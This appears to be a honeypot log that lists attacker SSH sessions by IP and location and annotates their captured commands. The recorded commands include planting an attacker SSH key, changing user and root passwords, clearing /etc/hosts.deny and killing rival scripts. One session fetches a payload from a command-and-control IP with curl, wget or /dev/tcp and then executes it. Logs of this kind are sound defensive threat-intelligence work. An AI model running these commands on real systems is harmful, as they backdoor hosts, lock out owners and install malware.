$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "amine\ngG339L6p7k2p\ngG339L6p7k2p"|passwd|bash
$ Enter new UNIX password:
$ echo "amine\ngG339L6p7k2p\ngG339L6p7k2p\n"|passwd
$ echo "root:PPeNQhsV0aYE"|chpasswd|bash
🎭 lotus_root_10 (136.232.11.10) β€” Chennai, India Β· 1 session Β· 20 cmds
2026-05-28 16:39 EDT Β· as amir/amir1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "amir1234\ncL2uoJ4TXeN9\ncL2uoJ4TXeN9"|passwd|bash
$ Enter new UNIX password:
$ echo "amir1234\ncL2uoJ4TXeN9\ncL2uoJ4TXeN9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_root_13 (212.132.120.41) β€” Berlin, Germany Β· 2 sessions Β· 40 cmds
2026-05-28 16:31 EDT Β· as github/123, training/training
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "training\noqtb5p7IgnRq\noqtb5p7IgnRq"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "training\noqtb5p7IgnRq\noqtb5p7IgnRq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\n1z6NdOvOEWmm\n1z6NdOvOEWmm"|passwd|bash
$ echo "123\n1z6NdOvOEWmm\n1z6NdOvOEWmm\n"|passwd
🎭 monsoon_root_6 (152.52.15.213) β€” Bengaluru, India Β· 2 sessions Β· 40 cmds
2026-05-28 16:31 EDT Β· as github/123, training/training
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123\nkXjn9nIzYm01\nkXjn9nIzYm01"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123\nkXjn9nIzYm01\nkXjn9nIzYm01\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "training\nJxtOfpoWkVU0\nJxtOfpoWkVU0"|passwd|bash
$ echo "training\nJxtOfpoWkVU0\nJxtOfpoWkVU0\n"|passwd
🎭 phantom_root_52 (147.50.231.135) β€” Huai Khwang, Thailand Β· 1 session Β· 20 cmds
2026-05-28 16:32 EDT Β· as khan/khan
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "khan\nsrdznqgPyY7t\nsrdznqgPyY7t"|passwd|bash
$ Enter new UNIX password:
$ echo "khan\nsrdznqgPyY7t\nsrdznqgPyY7t\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 k-pop_root_10 (112.151.178.49) β€” Seocho-gu, South Korea Β· 1 session Β· 19 cmds
2026-05-28 16:31 EDT Β· as root/Root@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:yAQesh28rj7H"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_45 (14.177.234.24) β€” Hanoi, Vietnam Β· 1 session Β· 20 cmds
2026-05-28 16:28 EDT Β· as ubuntu/123.com
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123.com\nb867Pj8VbdlF\nb867Pj8VbdlF"|passwd|bash
$ Enter new UNIX password:
$ echo "123.com\nb867Pj8VbdlF\nb867Pj8VbdlF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shogun_root_4 (118.193.61.170) β€” Tokyo, Japan Β· 1 session Β· 20 cmds
2026-05-28 16:26 EDT Β· as profe/profe
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "profe\nIfbK8poA9pp2\nIfbK8poA9pp2"|passwd|bash
$ Enter new UNIX password:
$ echo "profe\nIfbK8poA9pp2\nIfbK8poA9pp2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_53 (160.119.71.11) β€” Johannesburg, South Africa Β· 1 session Β· 1 cmd
2026-05-28 16:00 EDT Β· as root/trash
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_29 (43.112.68.103) β€” Charlottesville, United States Β· 1 session Β· 20 cmds
2026-05-28 15:56 EDT Β· as test/Test123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Test123\nwWJIuE7nZDot\nwWJIuE7nZDot"|passwd|bash
$ Enter new UNIX password:
$ echo "Test123\nwWJIuE7nZDot\nwWJIuE7nZDot\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_root_8 (61.76.112.4) β€” Changwon, South Korea Β· 1 session Β· 20 cmds
2026-05-28 14:23 EDT Β· as shiny/shiny
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "shiny\n3p3tktRytOuo\n3p3tktRytOuo"|passwd|bash
$ Enter new UNIX password:
$ echo "shiny\n3p3tktRytOuo\n3p3tktRytOuo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_16 (117.172.55.121) β€” Chengdu, China Β· 1 session Β· 3 cmds
2026-05-28 13:44 EDT Β· as root/12345678
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://106.74.21.237:60105/linux -o /tmp/aNhD7Lh4Xp; if [ ! -f /tmp/aNhD7Lh4Xp ]; then wget http://106.74.21.237:60105/linux -O /tmp/aNhD7Lh4Xp; fi; if [ ! -f /tmp/aNhD7Lh4Xp ]; then exec 6<>/dev/tcp/106.74.21.237/60105 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/aNhD7Lh4Xp ; chmod +x /tmp/aNhD7Lh4Xp && /tmp/aNhD7Lh4Xp km42evaCN5jueDZg4eB5PXzwnTCZ4Hk+YOrkYDV+9oIynvdwPnji4G41ePCCMZTwZD53/eR/PXzwnTCZ4HsweP3rdilz7p0wmvpzP3nk838/eu6bNoLxeTBg4OR0MXrxnzWM9H0pduX9fD5k8ZswlvZ6Nn/q8382fe6dN57ufzJg4uF/PXzwnTCZ4H4wYOHnfCl78JQum/FwMX7i43kne/iULp3yeil84OZgNn3wljeV8nwneOL9fzF97ps0gvh8PXjj4n4yavKfLpX1ZDZ26v18Nnr6lTCf+Go2eeL9dzdk8Z81gvN5PXjj4n4yavGeMIL3fSl56v16NXD2nzKa4HsyfP3ifTFk8p43gvF4MXTk4X8xavGUNoLyeTBg4uN4KXjxnTqa8Hs3e/Pnfyl88IIymfFkNnbq6XkzePaMNpXuez55/eJ7P2TzmDqa8Hs3e/PneSl78ZQunfdkMnfp630zeOCdMp/uezV3/eF9N2TznjqV9nMwbuLrfil99oIxn/dkNHnp5X42efWMM5XuezJ8/eZ7KXjzlDqa8Hs3e/PneSl49J4umfhkP3rp5X42evmMMZ33ZDB8/ep7KXjymjqa8Hs3e/PrYDV7+IIxnvBkNnnr6Xkwf/GMMZz2ZDJ6/eV6KXv2lTqa8Hs3e/PneSl49Zgum/NkNX/m6Xk2eveMMZnxZDV64f1/NnzunTWU+nw3f+PmbjN97pUzgvF4M2Di4XQxe/WeIJ/2ZDZ44P16NWTzmDqa8Hs3e/PneSly9oIzn+57Pnvp5X42efAc0MXqpBr2tmSgwp7PyMU=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/aNhD7Lh4Xp && /tmp/aNhD7Lh4Xp km42evaCN5jueDZg4eB5PXzwnTCZ4Hk+YOrkYDV+9oIynvdwPnji4G41ePCCMZTwZD53/eR/PXzwnTCZ4HsweP3rdilz7p0wmvpzP3nk838/eu6bNoLxeTBg4OR0MXrxnzWM9H0pduX9fD5k8ZswlvZ6Nn/q8382fe6dN57ufzJg4uF/PXzwnTCZ4H4wYOHnfCl78JQum/FwMX7i43kne/iULp3yeil84OZgNn3wljeV8nwneOL9fzF97ps0gvh8PXjj4n4yavKfLpX1ZDZ26v18Nnr6lTCf+Go2eeL9dzdk8Z81gvN5PXjj4n4yavGeMIL3fSl56v16NXD2nzKa4HsyfP3ifTFk8p43gvF4MXTk4X8xavGUNoLyeTBg4uN4KXjxnTqa8Hs3e/Pnfyl88IIymfFkNnbq6XkzePaMNpXuez55/eJ7P2TzmDqa8Hs3e/PneSl78ZQunfdkMnfp630zeOCdMp/uezV3/eF9N2TznjqV9nMwbuLrfil99oIxn/dkNHnp5X42efWMM5XuezJ8/eZ7KXjzlDqa8Hs3e/PneSl49J4umfhkP3rp5X42evmMMZ33ZDB8/ep7KXjymjqa8Hs3e/PrYDV7+IIxnvBkNnnr6Xkwf/GMMZz2ZDJ6/eV6KXv2lTqa8Hs3e/PneSl49Zgum/NkNX/m6Xk2eveMMZnxZDV64f1/NnzunTWU+nw3f+PmbjN97pUzgvF4M2Di4XQxe/WeIJ/2ZDZ44P16NWTzmDqa8Hs3e/PneSly9oIzn+57Pnvp5X42efAc0MXqpBr2tmSgwp7PyMU=" & // payload download from C2
$ head -c 3716336 > /tmp/r8SxvYMBWe // execute from /tmp
🎭 carnival_root_6 (187.107.88.97) β€” SΓ£o Bernardo do Campo, Brazil Β· 2 sessions Β· 38 cmds
2026-05-19 17:11 EDT Β· as root/Qwer123456, root/michal1
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:Y1KRPh7fN6bj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:MuPV9Pn9Qhoy"|chpasswd|bash
🎭 burger_root_32 (173.244.60.155) β€” New York, United States Β· 1 session Β· 19 cmds
2026-05-28 12:57 EDT Β· as root/Qwer123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:a67Upu70hWM7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bike_root_10 (64.188.77.26) β€” Amsterdam, Netherlands Β· 1 session Β· 19 cmds
2026-05-28 12:45 EDT Β· as root/Qwer123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eFcofmSyPfIr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_7 (202.83.16.183) β€” Bengaluru, India Β· 2 sessions Β· 4 cmds
2026-05-28 10:04 EDT Β· as root/Pa$$w0rd2024, ubuntu/999999
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
